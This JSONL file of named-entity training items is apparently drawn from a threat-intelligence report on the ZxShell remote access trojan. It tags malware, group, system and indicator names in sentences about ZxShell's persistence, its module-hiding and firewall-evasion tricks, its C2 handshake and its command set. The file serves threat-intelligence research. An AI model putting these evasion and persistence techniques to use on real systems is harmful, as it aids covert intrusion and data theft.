{"text": "Winnti : C&C : w[org_name].dnslookup.services : 443 .", "spans": {"Organization: Winnti": [[0, 6]], "System: C&C": [[9, 12]], "Indicator: w[org_name].dnslookup.services": [[15, 45]]}, "info": {"id": "aptner_train_001525", "source": "aptner_train"}}
{"text": "Middle Eastern hacking group is using FinFisher malware to conduct international espionage .", "spans": {"Malware: FinFisher": [[38, 47]]}, "info": {"id": "aptner_train_001526", "source": "aptner_train"}}
{"text": "Recently , there was a blog post on the takedown of a botnet used by threat actor group known as Group 72 and their involvement in Operation SMN .", "spans": {"Malware: botnet": [[54, 60]], "Organization: Group 72": [[97, 105]]}, "info": {"id": "aptner_train_001527", "source": "aptner_train"}}
{"text": "This group is sophisticated , well funded , and exclusively targets high profile organizations with high value intellectual property in the manufacturing , industrial , aerospace , defense , and media sector .", "spans": {}, "info": {"id": "aptner_train_001528", "source": "aptner_train"}}
{"text": "The primary attack vectors are watering-hole , spear phishing , and other web-based attacks .", "spans": {}, "info": {"id": "aptner_train_001529", "source": "aptner_train"}}
{"text": "Frequently , a remote administration tool ( RAT ) is used to maintain persistence within a victim ’s organization .", "spans": {"System: remote administration tool": [[15, 41]], "System: RAT": [[44, 47]]}, "info": {"id": "aptner_train_001530", "source": "aptner_train"}}
{"text": "These tools are used to further compromise the organization by attacking other hosts inside the targets network .", "spans": {}, "info": {"id": "aptner_train_001531", "source": "aptner_train"}}
{"text": "ZxShell ( aka Sensocode ) is a Remote Administration Tool ( RAT ) used by Group 72 to conduct cyber-espionage operations .", "spans": {"Malware: ZxShell": [[0, 7]], "Malware: Sensocode": [[14, 23]], "System: Remote Administration Tool": [[31, 57]], "System: RAT": [[60, 63]], "Organization: Group 72": [[74, 82]]}, "info": {"id": "aptner_train_001532", "source": "aptner_train"}}
{"text": "Once the RAT is installed on the host it will be used to administer the client , exfiltrate data , or leverage the client as a pivot to attack an organization ’s internal infrastructure .", "spans": {"System: RAT": [[9, 12]]}, "info": {"id": "aptner_train_001533", "source": "aptner_train"}}
{"text": "Here is a short list of the types of tools included with ZxShell :", "spans": {"Malware: ZxShell": [[57, 64]]}, "info": {"id": "aptner_train_001534", "source": "aptner_train"}}
{"text": "Keylogger ( used to capture passwords and other interesting data ) .", "spans": {"System: Keylogger": [[0, 9]]}, "info": {"id": "aptner_train_001535", "source": "aptner_train"}}
{"text": "Command line shell for remote administration .", "spans": {"System: Command line shell": [[0, 18]]}, "info": {"id": "aptner_train_001536", "source": "aptner_train"}}
{"text": "Remote desktop .", "spans": {"System: Remote desktop": [[0, 14]]}, "info": {"id": "aptner_train_001537", "source": "aptner_train"}}
{"text": "Various network attack tools used to fingerprint and compromise other hosts on the network .", "spans": {"System: Various network attack tools": [[0, 28]]}, "info": {"id": "aptner_train_001538", "source": "aptner_train"}}
{"text": "Local user account creation tools .", "spans": {"System: Local user account creation tools": [[0, 33]]}, "info": {"id": "aptner_train_001539", "source": "aptner_train"}}
{"text": "For a complete list of tools please see the MainConnectionIo section .", "spans": {}, "info": {"id": "aptner_train_001540", "source": "aptner_train"}}
{"text": "The following paper is a technical analysis on the functionality of ZxShell .", "spans": {"Malware: ZxShell": [[68, 75]]}, "info": {"id": "aptner_train_001541", "source": "aptner_train"}}
{"text": "The analysts involved were able to identify command and control ( C2 ) servers , dropper and installation methods , means of persistence , and identify the attack tools that are core to the RAT ’s purpose .", "spans": {"System: command and control": [[44, 63]], "System: C2": [[66, 68]], "System: RAT": [[190, 193]]}, "info": {"id": "aptner_train_001542", "source": "aptner_train"}}
{"text": "In addition , the researchers used their analysis to provide detection coverage for Snort , Fireamp , and ClamAV .", "spans": {"System: Snort": [[84, 89]], "System: Fireamp": [[92, 99]], "System: ClamAV": [[106, 112]]}, "info": {"id": "aptner_train_001543", "source": "aptner_train"}}
{"text": "ZxShell has been around since 2004 .", "spans": {"Malware: ZxShell": [[0, 7]]}, "info": {"id": "aptner_train_001544", "source": "aptner_train"}}
{"text": "There are a lot of versions available in the underground market .", "spans": {}, "info": {"id": "aptner_train_001545", "source": "aptner_train"}}
{"text": "We have analyzed the most common version of ZxShell , version 3.10 .", "spans": {"Malware: ZxShell": [[44, 51]]}, "info": {"id": "aptner_train_001546", "source": "aptner_train"}}
{"text": "There are newer versions , up to version 3.39 as of October 2014 .", "spans": {}, "info": {"id": "aptner_train_001547", "source": "aptner_train"}}
{"text": "An individual who goes by the name LZX in some online forums is believed to be the original author of ZxShell .", "spans": {"Malware: ZxShell": [[102, 109]]}, "info": {"id": "aptner_train_001548", "source": "aptner_train"}}
{"text": "Since ZxShell has been around since at least 2004 , numerous people have purchased or obtained the tools necessary to set up ZxShell command and control servers ( C&C ) and generate the malware that is placed on the victim ’s network .", "spans": {"Malware: ZxShell": [[6, 13], [125, 132]], "System: command and control": [[133, 152]], "System: C&C": [[163, 166]]}, "info": {"id": "aptner_train_001549", "source": "aptner_train"}}
{"text": "ZxShell has been observed to be distributed through phishing attacks , dropped by exploits that leverage vulnerabilities such as CVE-2011-2462 , CVE-2013-3163 , and CVE-2014-0322 .", "spans": {"Malware: ZxShell": [[0, 7]], "Vulnerability: CVE-2011-2462": [[129, 142]], "Vulnerability: CVE-2013-3163": [[145, 158]], "Vulnerability: CVE-2014-0322": [[165, 178]]}, "info": {"id": "aptner_train_001550", "source": "aptner_train"}}
{"text": "To illustrate the functionality of main ZxShell module , Let ’s take a look at the following sample :", "spans": {"Malware: ZxShell": [[40, 47]]}, "info": {"id": "aptner_train_001551", "source": "aptner_train"}}
{"text": "MD5 : e3878d541d17b156b7ca447eeb49d96a .", "spans": {"Indicator: e3878d541d17b156b7ca447eeb49d96a": [[6, 38]]}, "info": {"id": "aptner_train_001552", "source": "aptner_train"}}
{"text": "SHA256 : 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c .", "spans": {"Indicator: 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c": [[9, 73]]}, "info": {"id": "aptner_train_001553", "source": "aptner_train"}}
{"text": "It exports the following functions , which are examined in greater detail below : DllMain Install UnInstall ServiceMain ShellMain ShellMainThread zxFunction001 zxFunction002 .", "spans": {}, "info": {"id": "aptner_train_001554", "source": "aptner_train"}}
{"text": "DllMain performs the initialization of ZxShell .", "spans": {"Malware: ZxShell": [[39, 46]]}, "info": {"id": "aptner_train_001555", "source": "aptner_train"}}
{"text": "It allocates a buffer of 0x2800 bytes and copies the code for the ZxGetLibAndProcAddr function .", "spans": {}, "info": {"id": "aptner_train_001556", "source": "aptner_train"}}
{"text": "To copy memory , the memcpy function is invoked .", "spans": {}, "info": {"id": "aptner_train_001557", "source": "aptner_train"}}
{"text": "It is not directly used from msvcrt.dll but is instead copied to another memory chunk before being called .", "spans": {"Indicator: msvcrt.dll": [[29, 39]]}, "info": {"id": "aptner_train_001558", "source": "aptner_train"}}
{"text": "Finally , the trojan Import Address Table ( IAT ) is resolved and the file path of the process that hosts the DLL is resolved and saved in a global variable .", "spans": {"Malware: trojan": [[14, 20]], "System: Import Address Table": [[21, 41]], "System: IAT": [[44, 47]], "System: DLL": [[110, 113]]}, "info": {"id": "aptner_train_001559", "source": "aptner_train"}}
{"text": "ZxShell.dll is injected in a shared SVCHOST process .", "spans": {"Indicator: ZxShell.dll": [[0, 11]], "System: SVCHOST": [[36, 43]]}, "info": {"id": "aptner_train_001560", "source": "aptner_train"}}
{"text": "The Svchost group registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost is opened and the netsvc group value data is queried to generate a name for the service .", "spans": {"System: Svchost": [[4, 11]], "System: HKLM\\SOFTWARE\\Microsoft\\Windows": [[31, 62]], "System: netsvc": [[107, 113]]}, "info": {"id": "aptner_train_001561", "source": "aptner_train"}}
{"text": "Before the malware can be installed a unique name must to be generated for the service .", "spans": {}, "info": {"id": "aptner_train_001562", "source": "aptner_train"}}
{"text": "The malware accomplishes this through querying the netsvc group value data located in the svchost group registry key which is HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost .", "spans": {"System: netsvc": [[51, 57]], "System: svchost": [[90, 97]], "System: HKLM\\SOFTWARE\\Microsoft\\Windows": [[126, 157]]}, "info": {"id": "aptner_train_001563", "source": "aptner_train"}}
{"text": "At startup , Svchost.exe checks the services part of the registry and constructs a list of services to load .", "spans": {"Indicator: Svchost.exe": [[13, 24]]}, "info": {"id": "aptner_train_001564", "source": "aptner_train"}}
{"text": "Each Svchost session can contain multiple shared services that are organized in groups .", "spans": {"System: Svchost": [[5, 12]]}, "info": {"id": "aptner_train_001565", "source": "aptner_train"}}
{"text": "Therefore , separate services can run , depending on how and where Svchost.exe is started .", "spans": {"Indicator: Svchost.exe": [[67, 78]]}, "info": {"id": "aptner_train_001566", "source": "aptner_train"}}
{"text": "Svchost.exe groups are identified in the above registry key .", "spans": {"Indicator: Svchost.exe": [[0, 11]]}, "info": {"id": "aptner_train_001567", "source": "aptner_train"}}
{"text": "Each value under this key represents a separate Svchost group and appears as a separate instance when you are viewing active processes .", "spans": {"System: Svchost": [[48, 55]]}, "info": {"id": "aptner_train_001568", "source": "aptner_train"}}
{"text": "Each value is a REG_MULTI_SZ value and contains the services that run under that Svchost group .", "spans": {"System: Svchost": [[81, 88]]}, "info": {"id": "aptner_train_001569", "source": "aptner_train"}}
{"text": "Each Svchost group can contain one or more service names that are extracted from the following registry key , whose Parameters key contains a ServiceDLL value : HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Service .", "spans": {"System: Svchost": [[5, 12]], "System: ServiceDLL": [[142, 152]]}, "info": {"id": "aptner_train_001570", "source": "aptner_train"}}
{"text": "On a Windows machine , the netsvc group contains names of both existing and non-existing services .", "spans": {"System: Windows": [[5, 12]], "System: netsvc": [[27, 33]]}, "info": {"id": "aptner_train_001571", "source": "aptner_train"}}
{"text": "ZxShell exploits this fact by cycling between each of the names , verifying the existence of the real service .", "spans": {"Malware: ZxShell": [[0, 7]]}, "info": {"id": "aptner_train_001572", "source": "aptner_train"}}
{"text": "The service ’s existence is verified with the ServiceExists function , which attempts to open the relative registry sub-key in HKLM\\SYSTEM\\CurrentControlSet\\Services .", "spans": {}, "info": {"id": "aptner_train_001573", "source": "aptner_train"}}
{"text": "The first service name that is not installed on the system becomes the ZxShell service name .", "spans": {"Malware: ZxShell": [[71, 78]]}, "info": {"id": "aptner_train_001574", "source": "aptner_train"}}
{"text": "A new service is then created using the service parser function ProcessScCommand .", "spans": {}, "info": {"id": "aptner_train_001575", "source": "aptner_train"}}
{"text": "ZxShell implemented its own version of the Windows SC command .", "spans": {"Malware: ZxShell": [[0, 7]], "System: Windows SC command": [[43, 61]]}, "info": {"id": "aptner_train_001576", "source": "aptner_train"}}
{"text": "There are minor differences between the ZxShell implementation of this command and the original Windows one .", "spans": {"Malware: ZxShell": [[40, 47]], "System: Windows": [[96, 103]]}, "info": {"id": "aptner_train_001577", "source": "aptner_train"}}
{"text": "The installed service registry key is opened and the 2 values under its Parameter subkey are created .", "spans": {}, "info": {"id": "aptner_train_001578", "source": "aptner_train"}}
{"text": "These 2 values , ServiceDll and ServiceDllUnloadOnStop are needed for services that run in a shared process .", "spans": {"System: ServiceDll": [[17, 27]], "System: ServiceDllUnloadOnStop": [[32, 54]]}, "info": {"id": "aptner_train_001579", "source": "aptner_train"}}
{"text": "Before the service is started ChangeServiceConfig is called to modify the service type to shared and interactive .", "spans": {}, "info": {"id": "aptner_train_001580", "source": "aptner_train"}}
{"text": "If the service fails to start then a random service name formatted as netsvc_xxxxxxxx , where xxxxxxxx represent an 8-digit random hex value , is added to the netsvc group and the entire function is repeated .", "spans": {"System: netsvc": [[159, 165]]}, "info": {"id": "aptner_train_001581", "source": "aptner_train"}}
{"text": "This function is the entry point of the service .", "spans": {}, "info": {"id": "aptner_train_001582", "source": "aptner_train"}}
{"text": "It registers the service using the RegisterServiceCtrlHandler Windows API function .", "spans": {"System: Windows": [[62, 69]]}, "info": {"id": "aptner_train_001583", "source": "aptner_train"}}
{"text": "The ZxShell service handler routine is only a stub : it responds to each service request code , doing nothing , and finally exits .", "spans": {"Malware: ZxShell": [[4, 11]]}, "info": {"id": "aptner_train_001584", "source": "aptner_train"}}
{"text": "It sets the service status to RUNNING and finally calls the ShellMain function of ZxShell .", "spans": {"Malware: ZxShell": [[82, 89]]}, "info": {"id": "aptner_train_001585", "source": "aptner_train"}}
{"text": "The ShellMain function is a stub that relocates the DLL to another buffer and spawns a thread that starts from ShellMainThreadInt at offset +0xC0CD .", "spans": {"System: DLL": [[52, 55]]}, "info": {"id": "aptner_train_001586", "source": "aptner_train"}}
{"text": "The ShellMainThreadInt function gets the HeapDestroy Windows API address and replaces the first 3 bytes with the RET 4 opcode .", "spans": {"System: Windows": [[53, 60]]}, "info": {"id": "aptner_train_001587", "source": "aptner_train"}}
{"text": "Subsequently , it calls the FreeLibrary function to free its own DLL buffer located at its original address .", "spans": {"System: DLL": [[65, 68]]}, "info": {"id": "aptner_train_001588", "source": "aptner_train"}}
{"text": "Because of this , the allocated heaps will not be freed .", "spans": {}, "info": {"id": "aptner_train_001589", "source": "aptner_train"}}
{"text": "It re-copies the DLL from the new buffer to the original one using the memcpy function .", "spans": {"System: DLL": [[17, 20]]}, "info": {"id": "aptner_train_001590", "source": "aptner_train"}}
{"text": "Finally , it spawns the main thread that starts at the original location of ShellMainThread procedure , and terminates .", "spans": {}, "info": {"id": "aptner_train_001591", "source": "aptner_train"}}
{"text": "At this point , the ZxShell library is no longer linked in the module list of the host process .", "spans": {"Malware: ZxShell": [[20, 27]]}, "info": {"id": "aptner_train_001592", "source": "aptner_train"}}
{"text": "This is important because if any system tool tries to open the host process it will never display the ZxShell DLL .", "spans": {"Malware: ZxShell": [[102, 109]], "System: DLL": [[110, 113]]}, "info": {"id": "aptner_train_001593", "source": "aptner_train"}}
{"text": "This thread implements the main code , responsible for the entire botnet DLL .", "spans": {"Malware: botnet": [[66, 72]], "System: DLL": [[73, 76]]}, "info": {"id": "aptner_train_001594", "source": "aptner_train"}}
{"text": "First , it checks if the DLL is executed as a service .", "spans": {"System: DLL": [[25, 28]]}, "info": {"id": "aptner_train_001595", "source": "aptner_train"}}
{"text": "If so , it spawns the service watchdog thread .", "spans": {"System: watchdog": [[30, 38]]}, "info": {"id": "aptner_train_001596", "source": "aptner_train"}}
{"text": "The watchdog thread checks the registry path of the ZxShell service every 2 seconds , to verify that it has n’t been modified .", "spans": {"System: watchdog": [[4, 12]], "Malware: ZxShell": [[52, 59]]}, "info": {"id": "aptner_train_001597", "source": "aptner_train"}}
{"text": "If a user or an application modifies the ZxShell service registry key , the code restores the original infected service key and values .", "spans": {"Malware: ZxShell": [[41, 48]]}, "info": {"id": "aptner_train_001598", "source": "aptner_train"}}
{"text": "The buffer containing the ZxShell Dll in the new location is freed using the VirtualFree API function .", "spans": {"Malware: ZxShell": [[26, 33]], "System: Dll": [[34, 37]]}, "info": {"id": "aptner_train_001599", "source": "aptner_train"}}
{"text": "A handle to the DLL file is taken in order to make its deletion more difficult .", "spans": {"System: DLL": [[16, 19]]}, "info": {"id": "aptner_train_001600", "source": "aptner_train"}}
{"text": "The ZxShell mutex is created named @_ZXSHELL_@ .", "spans": {"System: ZxShell": [[4, 11]]}, "info": {"id": "aptner_train_001601", "source": "aptner_train"}}
{"text": "ZxShell plugins are parsed and loaded with the AnalyseAndLoadPlugins function .", "spans": {"Malware: ZxShell": [[0, 7]]}, "info": {"id": "aptner_train_001602", "source": "aptner_train"}}
{"text": "The plugin registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\zxplug is opened and each value is queried .", "spans": {}, "info": {"id": "aptner_train_001603", "source": "aptner_train"}}
{"text": "The registry value contains the plugin file name .", "spans": {}, "info": {"id": "aptner_train_001604", "source": "aptner_train"}}
{"text": "The target file is loaded using the LoadLibrary API function , and the address of the exported function zxMain is obtained with GetProcAddress .", "spans": {}, "info": {"id": "aptner_train_001605", "source": "aptner_train"}}
{"text": "If the target filename is incorrect or invalid the plugin file is deleted and the registry value is erased .", "spans": {}, "info": {"id": "aptner_train_001606", "source": "aptner_train"}}
{"text": "That is performed by the function DeleteAndLogPlugin .", "spans": {}, "info": {"id": "aptner_train_001607", "source": "aptner_train"}}
{"text": "Otherwise , the plugin is added to an internal list .", "spans": {}, "info": {"id": "aptner_train_001608", "source": "aptner_train"}}
{"text": "The thread KeyloggerThread is spawned and is responsible for doing keylogging on the target workstation .", "spans": {"Organization: KeyloggerThread": [[11, 26]]}, "info": {"id": "aptner_train_001609", "source": "aptner_train"}}
{"text": "We will take a look at the keylogger later on .", "spans": {"System: keylogger": [[27, 36]]}, "info": {"id": "aptner_train_001610", "source": "aptner_train"}}
{"text": "Finally the main network communication function GetIpListAndConnect is called .", "spans": {}, "info": {"id": "aptner_train_001611", "source": "aptner_train"}}
{"text": "This function is at the core of the RAT ’s network communication .", "spans": {"System: RAT": [[36, 39]]}, "info": {"id": "aptner_train_001612", "source": "aptner_train"}}
{"text": "It starts by initializing a random number generator and reading 100 bytes inside the ZxShell Dll at a hardcoded location .", "spans": {"Malware: ZxShell": [[85, 92]], "System: Dll": [[93, 96]]}, "info": {"id": "aptner_train_001613", "source": "aptner_train"}}
{"text": "These bytes are XOR encrypted with the byte-key 0x85 and contains a list of remote hosts where to connect .", "spans": {}, "info": {"id": "aptner_train_001614", "source": "aptner_train"}}
{"text": "The data is decrypted , the remote host list is parsed and verified using the BuildTargetIpListStruct function .", "spans": {}, "info": {"id": "aptner_train_001615", "source": "aptner_train"}}
{"text": "There are 3 types of lists recognized by ZxShell : plain ip addresses , HTTP and FTP addresses .", "spans": {"Malware: ZxShell": [[41, 48]]}, "info": {"id": "aptner_train_001616", "source": "aptner_train"}}
{"text": "If the list does not contain any item , or if the verification has failed , the ZxShell sample tries to connect to a hardcoded host", "spans": {"Malware: ZxShell": [[80, 87]]}, "info": {"id": "aptner_train_001617", "source": "aptner_train"}}
{"text": "with the goal of retrieving a new updated list .", "spans": {}, "info": {"id": "aptner_train_001618", "source": "aptner_train"}}
{"text": "Otherwise , ZxShell tries to connect to the first item of the list .", "spans": {"Malware: ZxShell": [[12, 19]]}, "info": {"id": "aptner_train_001619", "source": "aptner_train"}}
{"text": "If ZxShell successfully connects to the remote host , the function DoHandshake is called .", "spans": {"Malware: ZxShell": [[3, 10]]}, "info": {"id": "aptner_train_001620", "source": "aptner_train"}}
{"text": "This function implements the initial handshake which consists of exchanging 16 bytes , 0x00001985 and 0x00000425,", "spans": {}, "info": {"id": "aptner_train_001621", "source": "aptner_train"}}
{"text": "with the server .", "spans": {}, "info": {"id": "aptner_train_001622", "source": "aptner_train"}}
{"text": "The function GetLocalPcDescrStr is used to compose a large string that contains system information of the target workstation .", "spans": {}, "info": {"id": "aptner_train_001623", "source": "aptner_train"}}
{"text": "The string is sent to the remote host and the response is checked to see if the first byte of the response is 0xF4, an arbitrary byte .", "spans": {}, "info": {"id": "aptner_train_001624", "source": "aptner_train"}}
{"text": "If it is , the botnet connection I/O procedure is called through the MainConnectionIo function .", "spans": {"Malware: botnet": [[15, 21]]}, "info": {"id": "aptner_train_001625", "source": "aptner_train"}}
{"text": "Otherwise , the ZxShell code closes the socket used and sleeps for 30 seconds .", "spans": {"Malware: ZxShell": [[16, 23]]}, "info": {"id": "aptner_train_001626", "source": "aptner_train"}}
{"text": "It will then retry the connection with the next remote host , if there is one .", "spans": {}, "info": {"id": "aptner_train_001627", "source": "aptner_train"}}
{"text": "It is noteworthy that this function includes the code to set the ZxShell node as a server : if one of the hardcoded boolean value is set to 1, a listening socket is created .", "spans": {"Malware: ZxShell": [[65, 72]]}, "info": {"id": "aptner_train_001628", "source": "aptner_train"}}
{"text": "The code waits for an incoming connection .", "spans": {}, "info": {"id": "aptner_train_001629", "source": "aptner_train"}}
{"text": "When the connection is established a new thread is spawned that starts with the MainConnectionIo function .", "spans": {}, "info": {"id": "aptner_train_001630", "source": "aptner_train"}}
{"text": "The MainConnectionIo function checks if the Windows Firewall is enabled , sets the Tcp Keep Alive value and Non-blocking mode connection options and receives data from the remote host through the ReceiveCommandData function .", "spans": {"System: Windows": [[44, 51]], "System: Firewall": [[52, 60]], "System: Tcp Keep Alive": [[83, 97]]}, "info": {"id": "aptner_train_001631", "source": "aptner_train"}}
{"text": "Then the connection is retried .", "spans": {}, "info": {"id": "aptner_train_001632", "source": "aptner_train"}}
{"text": "The received command is then processed by the ZxShell function with the ProcessCommand function .", "spans": {"Malware: ZxShell": [[46, 53]]}, "info": {"id": "aptner_train_001633", "source": "aptner_train"}}
{"text": "The command processing function starts by substituting the main module name and path in the hosting process PEB , with the one of the default internet browser .", "spans": {}, "info": {"id": "aptner_train_001634", "source": "aptner_train"}}
{"text": "This trick renders identification by firewall more cumbersome .", "spans": {"System: firewall": [[37, 45]]}, "info": {"id": "aptner_train_001635", "source": "aptner_train"}}
{"text": "A host firewall", "spans": {}, "info": {"id": "aptner_train_001636", "source": "aptner_train"}}
{"text": " recognize the outgoing connection as originated by the browser instead of the ZxShell service host process .", "spans": {"Malware: ZxShell": [[79, 86]]}, "info": {"id": "aptner_train_001637", "source": "aptner_train"}}
{"text": "The browser process always performs outgoing connections and the firewall should n’t block them .", "spans": {"System: firewall": [[65, 73]]}, "info": {"id": "aptner_train_001638", "source": "aptner_train"}}
{"text": "The command processing is straightforward .", "spans": {}, "info": {"id": "aptner_train_001639", "source": "aptner_train"}}
{"text": "Here is the list of common commands :", "spans": {}, "info": {"id": "aptner_train_001640", "source": "aptner_train"}}
{"text": "Help / ? Get help .", "spans": {}, "info": {"id": "aptner_train_001641", "source": "aptner_train"}}
{"text": "Exit / Quit Exit and shut down the botnet client .", "spans": {}, "info": {"id": "aptner_train_001642", "source": "aptner_train"}}
{"text": "SysInfo Get target System information .", "spans": {}, "info": {"id": "aptner_train_001643", "source": "aptner_train"}}
{"text": "SYNFlood Perform a SYN attack on a host .", "spans": {}, "info": {"id": "aptner_train_001644", "source": "aptner_train"}}
{"text": "Ps Process service Unix command implementation .", "spans": {"System: Unix": [[19, 23]]}, "info": {"id": "aptner_train_001645", "source": "aptner_train"}}
{"text": "CleanEvent Clear System Event log .", "spans": {}, "info": {"id": "aptner_train_001646", "source": "aptner_train"}}
{"text": "FindPass Find login account password .", "spans": {}, "info": {"id": "aptner_train_001647", "source": "aptner_train"}}
{"text": "FileTime Get time information about a file .", "spans": {}, "info": {"id": "aptner_train_001648", "source": "aptner_train"}}
{"text": "FindDialPass List all the dial-up accounts and passwords .", "spans": {}, "info": {"id": "aptner_train_001649", "source": "aptner_train"}}
{"text": "User Account Management System .", "spans": {}, "info": {"id": "aptner_train_001650", "source": "aptner_train"}}
{"text": "TransFile Transfer file in or from remote host .", "spans": {}, "info": {"id": "aptner_train_001651", "source": "aptner_train"}}
{"text": "Execute Run a program in the remote host .", "spans": {}, "info": {"id": "aptner_train_001652", "source": "aptner_train"}}
{"text": "SC Service control command , implemented as the Windows one .", "spans": {"System: Windows": [[48, 55]]}, "info": {"id": "aptner_train_001653", "source": "aptner_train"}}
{"text": "CA Clone user account .", "spans": {}, "info": {"id": "aptner_train_001654", "source": "aptner_train"}}
{"text": "RunAs Create new process as another User or Process context .", "spans": {}, "info": {"id": "aptner_train_001655", "source": "aptner_train"}}
{"text": "TermSvc Terminal service configuration ( working on Win Xp/2003 ) .", "spans": {"System: Win Xp/2003": [[52, 63]]}, "info": {"id": "aptner_train_001656", "source": "aptner_train"}}
{"text": "GetCMD Remote Shell .", "spans": {}, "info": {"id": "aptner_train_001657", "source": "aptner_train"}}
{"text": "Shutdown Logout , shutdown or restart the target system .", "spans": {}, "info": {"id": "aptner_train_001658", "source": "aptner_train"}}
{"text": "ZXARPS Spoofing , redirection , packet capture .", "spans": {}, "info": {"id": "aptner_train_001659", "source": "aptner_train"}}
{"text": "ZXNC Run ZXNC v1.1 – a simple telnet client .", "spans": {}, "info": {"id": "aptner_train_001660", "source": "aptner_train"}}
{"text": "ZXHttpProxy Run a HTTP proxy server on the workstation .", "spans": {}, "info": {"id": "aptner_train_001661", "source": "aptner_train"}}
{"text": "ZXSockProxy Run a Sock 4 & 5 Proxy server .", "spans": {}, "info": {"id": "aptner_train_001662", "source": "aptner_train"}}
{"text": "ZXHttpServer Run a custom HTTP server .", "spans": {}, "info": {"id": "aptner_train_001663", "source": "aptner_train"}}
{"text": "PortScan Run TCP Port MultiScanner v1.0 .", "spans": {}, "info": {"id": "aptner_train_001664", "source": "aptner_train"}}
{"text": "KeyLog Capture or record the remote computer ’s keystrokes .", "spans": {}, "info": {"id": "aptner_train_001665", "source": "aptner_train"}}
{"text": "The implementation is a userland keylogger that polls the keymap with each keystroke .", "spans": {"System: keylogger": [[33, 42]]}, "info": {"id": "aptner_train_001666", "source": "aptner_train"}}
{"text": "LoadDll Load a DLL into the specified process .", "spans": {"System: LoadDll": [[0, 7]], "System: DLL": [[15, 18]]}, "info": {"id": "aptner_train_001667", "source": "aptner_train"}}
{"text": "End Terminate ZxShell DLL .", "spans": {"Malware: ZxShell": [[14, 21]], "System: DLL": [[22, 25]]}, "info": {"id": "aptner_train_001668", "source": "aptner_train"}}
{"text": "Uninstall Uninstall and terminate ZxShell bot DLL .", "spans": {"Malware: ZxShell": [[34, 41]], "System: DLL": [[46, 49]]}, "info": {"id": "aptner_train_001669", "source": "aptner_train"}}
{"text": "ShareShell Share a shell to other .", "spans": {}, "info": {"id": "aptner_train_001670", "source": "aptner_train"}}
{"text": "CloseFW Switch off Windows Firewall .", "spans": {"System: Windows": [[19, 26]]}, "info": {"id": "aptner_train_001671", "source": "aptner_train"}}
{"text": "FileMG File Manager . winvnc Remote Desktop . rPortMap Port Forwarding . capsrv Video Device Spying . zxplug Add and load a ZxShell custom plugin .", "spans": {"Malware: ZxShell": [[124, 131]]}, "info": {"id": "aptner_train_001672", "source": "aptner_train"}}
{"text": "This set of functionality allows the operator complete control of a system .", "spans": {}, "info": {"id": "aptner_train_001673", "source": "aptner_train"}}
{"text": "Being able to transfer and execute files on the infected system means the attacker can run any code they please .", "spans": {}, "info": {"id": "aptner_train_001674", "source": "aptner_train"}}
{"text": "Further , the keylogging and remote desktop functionality allows the operator to spy on the infected machine , observing all keystrokes and viewing all user actions .", "spans": {}, "info": {"id": "aptner_train_001675", "source": "aptner_train"}}
{"text": "Unloads ZxShell and deletes all of the active components .", "spans": {"Malware: ZxShell": [[8, 15]]}, "info": {"id": "aptner_train_001676", "source": "aptner_train"}}
{"text": "This simply deletes the ZxShell service key from the Windows registry ( using SHDeleteKey Api ) and all of the subkeys .", "spans": {"Malware: ZxShell": [[24, 31]], "System: Windows": [[53, 60]]}, "info": {"id": "aptner_train_001677", "source": "aptner_train"}}
{"text": "Finally , it marks ZxShell main Dll for deletion with the MoveFileEx Windows API .", "spans": {"Malware: ZxShell": [[19, 26]], "System: Dll": [[32, 35]], "System: Windows": [[69, 76]]}, "info": {"id": "aptner_train_001678", "source": "aptner_train"}}
{"text": "This function is the supporting functionality for WinVNC .", "spans": {"System: WinVNC": [[50, 56]]}, "info": {"id": "aptner_train_001679", "source": "aptner_train"}}
{"text": "To allow the VNC session to connect , the current network socket WSAProtcol_Info structure is written to a named pipe prior to calling zxFunction001 . zxFunction001 modifies the current process memory , uses data contained in the named pipe to create a socket , and then executes the code that sends the remote desktop session to the server controller .", "spans": {"System: VNC": [[13, 16]], "System: WSAProtcol_Info": [[65, 80]]}, "info": {"id": "aptner_train_001680", "source": "aptner_train"}}
{"text": "ZxFunction002 This will either bind the calling process to a port or has the calling process connect to a remote host .", "spans": {}, "info": {"id": "aptner_train_001681", "source": "aptner_train"}}
{"text": "The functionality ( connect or bind ) depends on the data contained within the named pipe .", "spans": {}, "info": {"id": "aptner_train_001682", "source": "aptner_train"}}
{"text": "Unlike zxFunction001, this is not used by", "spans": {}, "info": {"id": "aptner_train_001683", "source": "aptner_train"}}
{"text": "any of the RAT commands in the zxshell.dll .", "spans": {"System: RAT": [[11, 14]], "Indicator: zxshell.dll": [[31, 42]]}, "info": {"id": "aptner_train_001684", "source": "aptner_train"}}
{"text": "Apart from user-mode ZxShell droppers mentioned earlier , there is a file ( SHA256 : 1e200d0d3de360d9c32e30d4c98f07e100f6260a86a817943a8fb06995c15335 ) that installs a kernel device driver called loveusd.sys .", "spans": {"Malware: ZxShell": [[21, 28]], "Indicator: 1e200d0d3de360d9c32e30d4c98f07e100f6260a86a817943a8fb06995c15335": [[85, 149]], "Indicator: loveusd.sys": [[196, 207]]}, "info": {"id": "aptner_train_001685", "source": "aptner_train"}}
{"text": "The architecture of this dropper is different from the others : it starts extracting the main driver from itself .", "spans": {}, "info": {"id": "aptner_train_001686", "source": "aptner_train"}}
{"text": "It adds the SeLoadDriver privilege to its access token and proceeds to install the driver as a fake disk filter driver .", "spans": {"System: SeLoadDriver": [[12, 24]]}, "info": {"id": "aptner_train_001687", "source": "aptner_train"}}
{"text": "It then adds the “ Loveusd.sys ” extracted driver name to the upper filter list .", "spans": {"Indicator: Loveusd.sys": [[19, 30]]}, "info": {"id": "aptner_train_001688", "source": "aptner_train"}}
{"text": "In our analysed sample the “ Loveusd.sys ” driver is installed with the name “ USBHPMS ” .", "spans": {"Indicator: Loveusd.sys": [[29, 40]], "Indicator: USBHPMS": [[79, 86]]}, "info": {"id": "aptner_train_001689", "source": "aptner_train"}}
{"text": "Finally the driver is started using the ZwLoadDriver native API .", "spans": {}, "info": {"id": "aptner_train_001690", "source": "aptner_train"}}
{"text": "The ZxShell driver starts by acquiring some kernel information and then hooking “ ObReferenceObjectByHandle ” API .", "spans": {"Malware: ZxShell": [[4, 11]]}, "info": {"id": "aptner_train_001691", "source": "aptner_train"}}
